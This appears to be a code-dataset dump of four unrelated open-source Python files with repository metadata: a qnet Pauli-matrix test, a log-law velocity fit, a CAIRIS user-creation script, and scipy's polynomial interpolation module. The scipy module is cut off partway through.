tests/algebra/test_pauli_matrics.py
|
1
|
2399
|
"""Test for PauliX, PauliY, PauliZ"""
from sympy import I
import pytest
from qnet import (
PauliX, PauliY, PauliZ, LocalSigma, LocalSpace, LocalProjector, SpinSpace)
def test_fock_pauli_matrices():
"""Test correctness of Pauli matrices on a Fock space"""
assert PauliX(1) == LocalSigma(0, 1, hs=1) + LocalSigma(1, 0, hs=1)
assert PauliX(1) == PauliX('1') == PauliX(LocalSpace('1'))
assert PauliY(1).expand() == (
-I * LocalSigma(0, 1, hs=1) + I * LocalSigma(1, 0, hs=1))
assert PauliY(1) == PauliY('1') == PauliY(LocalSpace('1'))
assert PauliZ(1) == LocalProjector(0, hs=1) - LocalProjector(1, hs=1)
assert PauliZ(1) == PauliZ('1') == PauliZ(LocalSpace('1'))
assert PauliX(1, states=(0, 2)) == (
LocalSigma(0, 2, hs=1) + LocalSigma(2, 0, hs=1))
hs = LocalSpace("1", basis=('g', 'e', 'r'))
assert PauliX(hs) == LocalSigma(0, 1, hs=hs) + LocalSigma(1, 0, hs=hs)
assert PauliX(hs) == PauliX(hs, states=('g', 'e'))
assert PauliY(hs).expand() == (
-I * LocalSigma(0, 1, hs=hs) + I * LocalSigma(1, 0, hs=hs))
assert PauliY(hs) == PauliY(hs, states=('g', 'e'))
assert PauliZ(hs) == LocalProjector(0, hs=hs) - LocalProjector(1, hs=hs)
assert PauliZ(hs) == PauliZ(hs, states=('g', 'e'))
assert PauliX(hs, states=(0, 2)) == (
LocalSigma('g', 'r', hs=hs) + LocalSigma('r', 'g', hs=hs))
assert PauliX(hs, states=(0, 2)) == PauliX(hs, states=('g', 'r'))
def test_spin_pauli_matrices():
"""Test correctness of Pauli matrices on a spin space"""
hs = SpinSpace("s", spin='1/2', basis=('down', 'up'))
assert PauliX(hs) == (
LocalSigma('down', 'up', hs=hs) + LocalSigma('up', 'down', hs=hs))
assert PauliX(hs) == PauliX(hs, states=('down', 'up'))
assert PauliY(hs).expand() == (
-I * LocalSigma('down', 'up', hs=hs) +
I * LocalSigma('up', 'down', hs=hs))
assert PauliY(hs) == PauliY(hs, states=('down', 'up'))
assert PauliZ(hs) == (
LocalProjector('down', hs=hs) - LocalProjector('up', hs=hs))
assert PauliZ(hs) == PauliZ(hs, states=('down', 'up'))
hs = SpinSpace("s", spin=1, basis=('-', '0', '+'))
with pytest.raises(TypeError):
PauliX(hs, states=(0, 2))
assert PauliX(hs, states=('-', '+')) == (
LocalSigma('-', '+', hs=hs) + LocalSigma('+', '-', hs=hs))
assert PauliX(hs) == PauliX(hs, states=('-', '0'))
|
mit
| -3,286,054,655,234,274,000
| 43.425926
| 78
| 0.56857
| false
| 2.585129
| true
| false
| false
|
hujc91/uw-ffpg
|
pivTools/loglay_fit.py
|
1
|
1749
|
#---------- Forematters---------------------------------------------
import numpy as np
#-------------------------------------------------------------------
def loglay_fit(up, yp, ypthresL, ypthresH):
'''
Curve fit for velocity profiles in the log-law layer of a wall-bounded shear flow
u+ = a*log(y+) + b (eq.1)
Inputs:
up - dimensionless velocity scaled by inner-scaling velocity scale (u+)
yp - dimensionless coordiates scaled by inner-scaling length scale (y+)
ypthresL - lower bound of the log-law range (typical value range: [20,35])
ypthresH - upper bound of the log-law range (typical value range: [50,80])
Outputs:
u_grwrt - curve fit coefficient (a) in eq.1
u_intcp - curve fit interception (b) in eq.1
Note:
For fully developed turbulent flow over a flat surface:
a ~= 2.43
b ~ = 5.2
'''
# yplus index
idxloglay = np.where((yp>=ypthresL)&(yp<=ypthresH)==True)
# Take natural logarithm of u and y
ufit = up[idxloglay]
yfit = np.log(yp[idxloglay])
# Estimate the slope for least square regression
idxlsq0 = np.int(np.max(np.argmax(ufit)))
idxlsq1 = np.int(np.min(np.argmin(ufit)))
idxlsq2 = np.int(np.size(ufit)/2)
du = ufit[idxlsq0]-ufit[idxlsq1]
dy = yfit[idxlsq0]-yfit[idxlsq1]
dudy = du/dy
A = np.vstack([yfit, dudy*np.ones(len(yfit))]).T
u_grwrt, u_intcp = np.linalg.lstsq(A, ufit)[0]
# Correction to the interception
u_offset0 = ufit[idxlsq0] - (u_grwrt*yfit[idxlsq0]+u_intcp)
u_offset1 = ufit[idxlsq1] - (u_grwrt*yfit[idxlsq1]+u_intcp)
u_offset2 = ufit[idxlsq2] - (u_grwrt*yfit[idxlsq2]+u_intcp)
u_intcp = u_intcp + (u_offset0 + u_offset1 + u_offset2)/3
return u_grwrt,u_intcp
|
mit
| 8,867,636,776,251,121,000
| 32.634615
| 85
| 0.600343
| false
| 2.7984
| false
| false
| false
|
nathanbjenx/cairis
|
cairis/bin/add_cairis_user.py
|
1
|
3248
|
#!/usr/bin/python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, login_required
from flask_cors import CORS
from cairis.core.Borg import Borg
from cairis.core.MySQLDatabaseProxy import createDatabaseAccount,createDatabaseAndPrivileges,createDatabaseSchema
import cairis.core.BorgFactory
__author__ = 'Shamal Faily'
cairis.core.BorgFactory.dInitialise()
app = Flask(__name__)
app.config['DEBUG'] = True
b = Borg()
app.config['SECRET_KEY'] = b.secretKey
app.config['SECURITY_PASSWORD_HASH'] = b.passwordHash
app.config['SECURITY_PASSWORD_SALT'] = b.passwordSalt
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:' + b.rPasswd + '@' + b.dbHost + '/cairis_user'
db = SQLAlchemy(app)
cors = CORS(app)
roles_users = db.Table('roles_users', db.Column('user_id', db.Integer(), db.ForeignKey('auth_user.id')), db.Column('role_id', db.Integer(), db.ForeignKey('auth_role.id')))
class Role(db.Model, RoleMixin):
__tablename__ = 'auth_role'
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
__tablename__ = 'auth_user'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
name = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
user_datastore = SQLAlchemyUserDatastore(db,User, Role)
security = Security(app, user_datastore)
def main():
parser = argparse.ArgumentParser(description='Computer Aided Integration of Requirements and Information Security - Add CAIRIS user')
parser.add_argument('user',help='Email address')
parser.add_argument('password',help='password')
parser.add_argument('name',help='Full name')
args = parser.parse_args()
createDatabaseAccount(b.rPasswd,b.dbHost,b.dbPort,args.user,'')
createDatabaseAndPrivileges(b.rPasswd,b.dbHost,b.dbPort,args.user,'',args.user + '_default')
createDatabaseSchema(b.cairisRoot,b.dbHost,b.dbPort,args.user,'',args.user + '_default')
db.create_all()
user_datastore.create_user(email=args.user, password=args.password, name=args.name)
db.session.commit()
if __name__ == '__main__':
main()
|
apache-2.0
| 7,796,071,425,858,259,000
| 40.113924
| 171
| 0.740148
| false
| 3.362319
| false
| false
| false
|
maciejkula/scipy
|
scipy/interpolate/polyint.py
|
1
|
32302
|
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy.special import factorial
from scipy.lib.six import xrange
__all__ = ["KroghInterpolator", "krogh_interpolate", "BarycentricInterpolator",
"barycentric_interpolate", "PiecewisePolynomial",
"piecewise_polynomial_interpolate", "approximate_taylor_polynomial"]
def _isscalar(x):
"""Check whether x is if a scalar type, or 0-dim"""
return np.isscalar(x) or hasattr(x, 'shape') and x.shape == ()
class _Interpolator1D(object):
"""
Common features in univariate interpolation
Deal with input data type and interpolation axis rolling. The
actual interpolator can assume the y-data is of shape (n, r) where
`n` is the number of x-points, and `r` the number of variables,
and use self.dtype as the y-data type.
Attributes
----------
_y_axis
Axis along which the interpolation goes in the original array
_y_extra_shape
Additional trailing shape of the input arrays, excluding
the interpolation axis.
dtype
Dtype of the y-data arrays. Can be set via set_dtype, which
forces it to be float or complex.
Methods
-------
__call__
_prepare_x
_finish_y
_reshape_yi
_set_yi
_set_dtype
_evaluate
"""
__slots__ = ('_y_axis', '_y_extra_shape', 'dtype')
def __init__(self, xi=None, yi=None, axis=None):
self._y_axis = axis
self._y_extra_shape = None
self.dtype = None
if yi is not None:
self._set_yi(yi, xi=xi, axis=axis)
def __call__(self, x):
"""
Evaluate the interpolant
Parameters
----------
x : array-like
Points to evaluate the interpolant at.
Returns
-------
y : array-like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate(x)
return self._finish_y(y, x_shape)
def _evaluate(self, x):
"""
Actually evaluate the value of the interpolator.
"""
raise NotImplementedError()
def _prepare_x(self, x):
"""Reshape input x array to 1-D"""
x = np.asarray(x)
if not np.issubdtype(x.dtype, np.inexact):
# Cast integers etc to floats
x = x.astype(float)
x_shape = x.shape
return x.ravel(), x_shape
def _finish_y(self, y, x_shape):
"""Reshape interpolated y back to n-d array similar to initial y"""
y = y.reshape(x_shape + self._y_extra_shape)
if self._y_axis != 0 and x_shape != ():
nx = len(x_shape)
ny = len(self._y_extra_shape)
s = (list(range(nx, nx + self._y_axis))
+ list(range(nx)) + list(range(nx+self._y_axis, nx+ny)))
y = y.transpose(s)
return y
def _reshape_yi(self, yi, check=False):
yi = np.rollaxis(np.asarray(yi), self._y_axis)
if check and yi.shape[1:] != self._y_extra_shape:
ok_shape = "%r + (N,) + %r" % (self._y_extra_shape[-self._y_axis:],
self._y_extra_shape[:-self._y_axis])
raise ValueError("Data must be of shape %s" % ok_shape)
return yi.reshape((yi.shape[0], -1))
def _set_yi(self, yi, xi=None, axis=None):
if axis is None:
axis = self._y_axis
if axis is None:
raise ValueError("no interpolation axis specified")
yi = np.asarray(yi)
shape = yi.shape
if shape == ():
shape = (1,)
if xi is not None and shape[axis] != len(xi):
raise ValueError("x and y arrays must be equal in length along "
"interpolation axis.")
self._y_axis = (axis % yi.ndim)
self._y_extra_shape = yi.shape[:self._y_axis]+yi.shape[self._y_axis+1:]
self.dtype = None
self._set_dtype(yi.dtype)
def _set_dtype(self, dtype, union=False):
if np.issubdtype(dtype, np.complexfloating) \
or np.issubdtype(self.dtype, np.complexfloating):
self.dtype = np.complex_
else:
if not union or self.dtype != np.complex_:
self.dtype = np.float_
class _Interpolator1DWithDerivatives(_Interpolator1D):
def derivatives(self, x, der=None):
"""
Evaluate many derivatives of the polynomial at the point x
Produce an array of all derivative values at the point x.
Parameters
----------
x : array-like
Point or points at which to evaluate the derivatives
der : None or integer
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points). This number includes the function value as 0th
derivative.
Returns
-------
d : ndarray
Array with derivatives; d[j] contains the j-th derivative.
Shape of d[j] is determined by replacing the interpolation
axis in the original array with the shape of x.
Examples
--------
>>> KroghInterpolator([0,0,0],[1,2,3]).derivatives(0)
array([1.0,2.0,3.0])
>>> KroghInterpolator([0,0,0],[1,2,3]).derivatives([0,0])
array([[1.0,1.0],
[2.0,2.0],
[3.0,3.0]])
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate_derivatives(x, der)
y = y.reshape((y.shape[0],) + x_shape + self._y_extra_shape)
if self._y_axis != 0 and x_shape != ():
nx = len(x_shape)
ny = len(self._y_extra_shape)
s = ([0] + list(range(nx+1, nx + self._y_axis+1))
+ list(range(1,nx+1)) +
list(range(nx+1+self._y_axis, nx+ny+1)))
y = y.transpose(s)
return y
def derivative(self, x, der=1):
"""
Evaluate one derivative of the polynomial at the point x
Parameters
----------
x : array-like
Point or points at which to evaluate the derivatives
der : integer, optional
Which derivative to extract. This number includes the
function value as 0th derivative.
Returns
-------
d : ndarray
Derivative interpolated at the x-points. Shape of d is
determined by replacing the interpolation axis in the
original array with the shape of x.
Notes
-----
This is computed by evaluating all derivatives up to the desired
one (using self.derivatives()) and then discarding the rest.
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate_derivatives(x, der+1)
return self._finish_y(y[der], x_shape)
class KroghInterpolator(_Interpolator1DWithDerivatives):
"""
Interpolating polynomial for a set of points.
The polynomial passes through all the pairs (xi,yi). One may
additionally specify a number of derivatives at each point xi;
this is done by repeating the value xi and specifying the
derivatives as successive yi values.
Allows evaluation of the polynomial and all its derivatives.
For reasons of numerical stability, this function does not compute
the coefficients of the polynomial, although they can be obtained
by evaluating all the derivatives.
Parameters
----------
xi : array-like, length N
Known x-coordinates. Must be sorted in increasing order.
yi : array-like
Known y-coordinates. When an xi occurs two or more times in
a row, the corresponding yi's represent derivative values.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
Be aware that the algorithms implemented here are not necessarily
the most numerically stable known. Moreover, even in a world of
exact computation, unless the x coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon. In general, even with well-chosen
x values, degrees higher than about thirty cause problems with
numerical instability in this code.
Based on [1]_.
References
----------
.. [1] Krogh, "Efficient Algorithms for Polynomial Interpolation
and Numerical Differentiation", 1970.
Examples
--------
To produce a polynomial that is zero at 0 and 1 and has
derivative 2 at 0, call
>>> KroghInterpolator([0,0,1],[0,2,0])
This constructs the quadratic 2*X**2-2*X. The derivative condition
is indicated by the repeated zero in the xi array; the corresponding
yi values are 0, the function value, and 2, the derivative value.
For another example, given xi, yi, and a derivative ypi for each
point, appropriate arrays can be constructed as:
>>> xi_k, yi_k = np.repeat(xi, 2), np.ravel(np.dstack((yi,ypi)))
>>> KroghInterpolator(xi_k, yi_k)
To produce a vector-valued polynomial, supply a higher-dimensional
array for yi:
>>> KroghInterpolator([0,1],[[2,3],[4,5]])
This constructs a linear polynomial giving (2,3) at 0 and (4,5) at 1.
"""
def __init__(self, xi, yi, axis=0):
_Interpolator1DWithDerivatives.__init__(self, xi, yi, axis)
self.xi = np.asarray(xi)
self.yi = self._reshape_yi(yi)
self.n, self.r = self.yi.shape
c = np.zeros((self.n+1, self.r), dtype=self.dtype)
c[0] = self.yi[0]
Vk = np.zeros((self.n, self.r), dtype=self.dtype)
for k in xrange(1,self.n):
s = 0
while s <= k and xi[k-s] == xi[k]:
s += 1
s -= 1
Vk[0] = self.yi[k]/float(factorial(s))
for i in xrange(k-s):
if xi[i] == xi[k]:
raise ValueError("Elements if `xi` can't be equal.")
if s == 0:
Vk[i+1] = (c[i]-Vk[i])/(xi[i]-xi[k])
else:
Vk[i+1] = (Vk[i+1]-Vk[i])/(xi[i]-xi[k])
c[k] = Vk[k-s]
self.c = c
def _evaluate(self, x):
pi = 1
p = np.zeros((len(x), self.r), dtype=self.dtype)
p += self.c[0,np.newaxis,:]
for k in range(1, self.n):
w = x - self.xi[k-1]
pi = w*pi
p += pi[:,np.newaxis] * self.c[k]
return p
def _evaluate_derivatives(self, x, der=None):
n = self.n
r = self.r
if der is None:
der = self.n
pi = np.zeros((n, len(x)))
w = np.zeros((n, len(x)))
pi[0] = 1
p = np.zeros((len(x), self.r))
p += self.c[0,np.newaxis,:]
for k in xrange(1,n):
w[k-1] = x - self.xi[k-1]
pi[k] = w[k-1]*pi[k-1]
p += pi[k,:,np.newaxis]*self.c[k]
cn = np.zeros((max(der,n+1), len(x), r), dtype=self.dtype)
cn[:n+1,:,:] += self.c[:n+1,np.newaxis,:]
cn[0] = p
for k in xrange(1,n):
for i in xrange(1,n-k+1):
pi[i] = w[k+i-1]*pi[i-1]+pi[i]
cn[k] = cn[k]+pi[i,:,np.newaxis]*cn[k+i]
cn[k] *= factorial(k)
cn[n,:,:] = 0
return cn[:der]
def krogh_interpolate(xi,yi,x,der=0,axis=0):
"""
Convenience function for polynomial interpolation.
See `KroghInterpolator` for more details.
Parameters
----------
xi : array_like
Known x-coordinates.
yi : array_like
Known y-coordinates, of shape ``(xi.size, R)``. Interpreted as
vectors of length R, or scalars if R=1.
x : array_like
Point or points at which to evaluate the derivatives.
der : int or list
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Returns
-------
d : ndarray
If the interpolator's values are R-dimensional then the
returned array will be the number of derivatives by N by R.
If `x` is a scalar, the middle dimension will be dropped; if
the `yi` are scalars then the last dimension will be dropped.
See Also
--------
KroghInterpolator
Notes
-----
Construction of the interpolating polynomial is a relatively expensive
process. If you want to evaluate it repeatedly consider using the class
KroghInterpolator (which is what this function uses).
"""
P = KroghInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif _isscalar(der):
return P.derivative(x,der=der)
else:
return P.derivatives(x,der=np.amax(der)+1)[der]
def approximate_taylor_polynomial(f,x,degree,scale,order=None):
"""
Estimate the Taylor polynomial of f at x by polynomial fitting.
Parameters
----------
f : callable
The function whose Taylor polynomial is sought. Should accept
a vector of `x` values.
x : scalar
The point at which the polynomial is to be evaluated.
degree : int
The degree of the Taylor polynomial
scale : scalar
The width of the interval to use to evaluate the Taylor polynomial.
Function values spread over a range this wide are used to fit the
polynomial. Must be chosen carefully.
order : int or None, optional
The order of the polynomial to be used in the fitting; `f` will be
evaluated ``order+1`` times. If None, use `degree`.
Returns
-------
p : poly1d instance
The Taylor polynomial (translated to the origin, so that
for example p(0)=f(x)).
Notes
-----
The appropriate choice of "scale" is a trade-off; too large and the
function differs from its Taylor polynomial too much to get a good
answer, too small and round-off errors overwhelm the higher-order terms.
The algorithm used becomes numerically unstable around order 30 even
under ideal circumstances.
Choosing order somewhat larger than degree may improve the higher-order
terms.
"""
if order is None:
order = degree
n = order+1
# Choose n points that cluster near the endpoints of the interval in
# a way that avoids the Runge phenomenon. Ensure, by including the
# endpoint or not as appropriate, that one point always falls at x
# exactly.
xs = scale*np.cos(np.linspace(0,np.pi,n,endpoint=n % 1)) + x
P = KroghInterpolator(xs, f(xs))
d = P.derivatives(x,der=degree+1)
return np.poly1d((d/factorial(np.arange(degree+1)))[::-1])
class BarycentricInterpolator(_Interpolator1D):
"""The interpolating polynomial for a set of points
Constructs a polynomial that passes through a given set of points.
Allows evaluation of the polynomial, efficient changing of the y
values to be interpolated, and updating by adding more x values.
For reasons of numerical stability, this function does not compute
the coefficients of the polynomial.
The values yi need to be provided before the function is
evaluated, but none of the preprocessing depends on them, so rapid
updates are possible.
Parameters
----------
xi : array-like
1-d array of x coordinates of the points the polynomial
should pass through
yi : array-like
The y coordinates of the points the polynomial should pass through.
If None, the y values will be supplied later via the `set_y` method.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
This class uses a "barycentric interpolation" method that treats
the problem as a special case of rational function interpolation.
This algorithm is quite stable, numerically, but even in a world of
exact computation, unless the x coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon.
Based on Berrut and Trefethen 2004, "Barycentric Lagrange Interpolation".
"""
def __init__(self, xi, yi=None, axis=0):
_Interpolator1D.__init__(self, xi, yi, axis)
self.xi = np.asarray(xi)
self.set_yi(yi)
self.n = len(self.xi)
self.wi = np.zeros(self.n)
self.wi[0] = 1
for j in xrange(1,self.n):
self.wi[:j] *= (self.xi[j]-self.xi[:j])
self.wi[j] = np.multiply.reduce(self.xi[:j]-self.xi[j])
self.wi **= -1
def set_yi(self, yi, axis=None):
"""
Update the y values to be interpolated
The barycentric interpolation algorithm requires the calculation
of weights, but these depend only on the xi. The yi can be changed
at any time.
Parameters
----------
yi : array_like
The y coordinates of the points the polynomial should pass through.
If None, the y values will be supplied later.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
"""
if yi is None:
self.yi = None
return
self._set_yi(yi, xi=self.xi, axis=axis)
self.yi = self._reshape_yi(yi)
self.n, self.r = self.yi.shape
def add_xi(self, xi, yi=None):
"""
Add more x values to the set to be interpolated
The barycentric interpolation algorithm allows easy updating by
adding more points for the polynomial to pass through.
Parameters
----------
xi : array_like
The x coordinates of the points that the polynomial should pass
through.
yi : array_like, optional
The y coordinates of the points the polynomial should pass through.
Should have shape ``(xi.size, R)``; if R > 1 then the polynomial is
vector-valued.
If `yi` is not given, the y values will be supplied later. `yi` should
be given if and only if the interpolator has y values specified.
"""
if yi is not None:
if self.yi is None:
raise ValueError("No previous yi value to update!")
yi = self._reshape_yi(yi, check=True)
self.yi = np.vstack((self.yi,yi))
else:
if self.yi is not None:
raise ValueError("No update to yi provided!")
old_n = self.n
self.xi = np.concatenate((self.xi,xi))
self.n = len(self.xi)
self.wi **= -1
old_wi = self.wi
self.wi = np.zeros(self.n)
self.wi[:old_n] = old_wi
for j in xrange(old_n,self.n):
self.wi[:j] *= (self.xi[j]-self.xi[:j])
self.wi[j] = np.multiply.reduce(self.xi[:j]-self.xi[j])
self.wi **= -1
def __call__(self, x):
"""Evaluate the interpolating polynomial at the points x
Parameters
----------
x : array-like
Points to evaluate the interpolant at.
Returns
-------
y : array-like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
Notes
-----
Currently the code computes an outer product between x and the
weights, that is, it constructs an intermediate array of size
N by len(x), where N is the degree of the polynomial.
"""
return _Interpolator1D.__call__(self, x)
def _evaluate(self, x):
if x.size == 0:
p = np.zeros((0, self.r), dtype=self.dtype)
else:
c = x[...,np.newaxis]-self.xi
z = c == 0
c[z] = 1
c = self.wi/c
p = np.dot(c,self.yi)/np.sum(c,axis=-1)[...,np.newaxis]
# Now fix where x==some xi
r = np.nonzero(z)
if len(r) == 1: # evaluation at a scalar
if len(r[0]) > 0: # equals one of the points
p = self.yi[r[0][0]]
else:
p[r[:-1]] = self.yi[r[-1]]
return p
def barycentric_interpolate(xi, yi, x, axis=0):
"""
Convenience function for polynomial interpolation.
Constructs a polynomial that passes through a given set of points,
then evaluates the polynomial. For reasons of numerical stability,
this function does not compute the coefficients of the polynomial.
This function uses a "barycentric interpolation" method that treats
the problem as a special case of rational function interpolation.
This algorithm is quite stable, numerically, but even in a world of
exact computation, unless the `x` coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon.
Parameters
----------
xi : array_like
1-d array of x coordinates of the points the polynomial should
pass through
yi : array_like
The y coordinates of the points the polynomial should pass through.
x : scalar or array_like
Points to evaluate the interpolator at.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Returns
-------
y : scalar or array_like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
See Also
--------
BarycentricInterpolator
Notes
-----
Construction of the interpolation weights is a relatively slow process.
If you want to call this many times with the same xi (but possibly
varying yi or x) you should use the class `BarycentricInterpolator`.
This is what this function uses internally.
"""
return BarycentricInterpolator(xi, yi, axis=axis)(x)
class PiecewisePolynomial(_Interpolator1DWithDerivatives):
"""Piecewise polynomial curve specified by points and derivatives
This class represents a curve that is a piecewise polynomial. It
passes through a list of points and has specified derivatives at
each point. The degree of the polynomial may vary from segment to
segment, as may the number of derivatives available. The degree
should not exceed about thirty.
Appending points to the end of the curve is efficient.
Parameters
----------
xi : array-like
a sorted 1-d array of x-coordinates
yi : array-like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i] (for axis=0)
orders : list of integers, or integer
a list of polynomial orders, or a single universal order
direction : {None, 1, -1}
indicates whether the xi are increasing or decreasing
+1 indicates increasing
-1 indicates decreasing
None indicates that it should be deduced from the first two xi
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
If orders is None, or orders[i] is None, then the degree of the
polynomial segment is exactly the degree required to match all i
available derivatives at both endpoints. If orders[i] is not None,
then some derivatives will be ignored. The code will try to use an
equal number of derivatives from each end; if the total number of
derivatives needed is odd, it will prefer the rightmost endpoint. If
not enough derivatives are available, an exception is raised.
"""
def __init__(self, xi, yi, orders=None, direction=None, axis=0):
_Interpolator1DWithDerivatives.__init__(self, axis=axis)
warnings.warn('PiecewisePolynomial is deprecated in scipy 0.14. '
'Use BPoly.from_derivatives instead.',
category=DeprecationWarning)
if axis != 0:
try:
yi = np.asarray(yi)
except ValueError:
raise ValueError("If yi is a list, then axis must be 0")
preslice = ((slice(None,None,None),) * (axis % yi.ndim))
slice0 = preslice + (0,)
slice1 = preslice + (slice(1, None, None),)
else:
slice0 = 0
slice1 = slice(1, None, None)
yi0 = np.asarray(yi[slice0])
self._set_yi(yi0)
self.xi = [xi[0]]
self.yi = [self._reshape_yi(yi0)]
self.n = 1
self.r = np.prod(self._y_extra_shape, dtype=np.int64)
self.direction = direction
self.orders = []
self.polynomials = []
self.extend(xi[1:],yi[slice1],orders)
def _make_polynomial(self,x1,y1,x2,y2,order,direction):
"""Construct the interpolating polynomial object
Deduces the number of derivatives to match at each end
from order and the number of derivatives available. If
possible it uses the same number of derivatives from
each end; if the number is odd it tries to take the
extra one from y2. In any case if not enough derivatives
are available at one end or another it draws enough to
make up the total from the other end.
"""
n = order+1
n1 = min(n//2,len(y1))
n2 = min(n-n1,len(y2))
n1 = min(n-n2,len(y1))
if n1+n2 != n:
raise ValueError("Point %g has %d derivatives, point %g has %d derivatives, but order %d requested" % (x1, len(y1), x2, len(y2), order))
if not (n1 <= len(y1) and n2 <= len(y2)):
raise ValueError("`order` input incompatible with length y1 or y2.")
xi = np.zeros(n)
yi = np.zeros((n, self.r), dtype=self.dtype)
xi[:n1] = x1
yi[:n1] = y1[:n1].reshape((n1, self.r))
xi[n1:] = x2
yi[n1:] = y2[:n2].reshape((n2, self.r))
return KroghInterpolator(xi,yi,axis=0)
def append(self, xi, yi, order=None):
"""
Append a single point with derivatives to the PiecewisePolynomial
Parameters
----------
xi : float
Input
yi : array_like
`yi` is the list of derivatives known at `xi`
order : integer or None
a polynomial order, or instructions to use the highest
possible order
"""
yi = self._reshape_yi(yi, check=True)
self._set_dtype(yi.dtype, union=True)
if self.direction is None:
self.direction = np.sign(xi-self.xi[-1])
elif (xi-self.xi[-1])*self.direction < 0:
raise ValueError("x coordinates must be in the %d direction: %s" % (self.direction, self.xi))
self.xi.append(xi)
self.yi.append(yi)
if order is None:
n1 = len(self.yi[-2])
n2 = len(self.yi[-1])
n = n1+n2
order = n-1
self.orders.append(order)
self.polynomials.append(self._make_polynomial(
self.xi[-2], self.yi[-2],
self.xi[-1], self.yi[-1],
order, self.direction))
self.n += 1
def extend(self, xi, yi, orders=None):
"""
Extend the PiecewisePolynomial by a list of points
Parameters
----------
xi : array_like
A sorted list of x-coordinates.
yi : list of lists of length N1
``yi[i]`` (if ``axis == 0``) is the list of derivatives known
at ``xi[i]``.
orders : int or list of ints
A list of polynomial orders, or a single universal order.
direction : {None, 1, -1}
Indicates whether the `xi` are increasing or decreasing.
+1 indicates increasing
-1 indicates decreasing
None indicates that it should be deduced from the first two `xi`.
"""
if self._y_axis == 0:
# allow yi to be a ragged list
for i in xrange(len(xi)):
if orders is None or _isscalar(orders):
self.append(xi[i],yi[i],orders)
else:
self.append(xi[i],yi[i],orders[i])
else:
preslice = (slice(None,None,None),) * self._y_axis
for i in xrange(len(xi)):
if orders is None or _isscalar(orders):
self.append(xi[i],yi[preslice + (i,)],orders)
else:
self.append(xi[i],yi[preslice + (i,)],orders[i])
def _evaluate(self, x):
if _isscalar(x):
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = self.polynomials[pos](x)
else:
m = len(x)
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = np.zeros((m, self.r), dtype=self.dtype)
if y.size > 0:
for i in xrange(self.n-1):
c = pos == i
y[c] = self.polynomials[i](x[c])
return y
def _evaluate_derivatives(self, x, der=None):
if der is None and self.polynomials:
der = self.polynomials[0].n
if _isscalar(x):
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = self.polynomials[pos].derivatives(x,der=der)
else:
m = len(x)
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = np.zeros((der,m,self.r), dtype=self.dtype)
if y.size > 0:
for i in xrange(self.n-1):
c = pos == i
y[:,c] = self.polynomials[i].derivatives(x[c],der=der)
return y
def piecewise_polynomial_interpolate(xi,yi,x,orders=None,der=0,axis=0):
"""
Convenience function for piecewise polynomial interpolation.
Parameters
----------
xi : array_like
A sorted list of x-coordinates.
yi : list of lists
``yi[i]`` is the list of derivatives known at ``xi[i]``.
x : scalar or array_like
Coordinates at which to evalualte the polynomial.
orders : int or list of ints, optional
A list of polynomial orders, or a single universal order.
der : int or list
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the `yi` array corresponding to the x-coordinate values.
Returns
-------
y : ndarray
Interpolated values or derivatives. If multiple derivatives
were requested, these are given along the first axis.
See Also
--------
PiecewisePolynomial
Notes
-----
If `orders` is None, or ``orders[i]`` is None, then the degree of the
polynomial segment is exactly the degree required to match all i
available derivatives at both endpoints. If ``orders[i]`` is not None,
then some derivatives will be ignored. The code will try to use an
equal number of derivatives from each end; if the total number of
derivatives needed is odd, it will prefer the rightmost endpoint. If
not enough derivatives are available, an exception is raised.
Construction of these piecewise polynomials can be an expensive process;
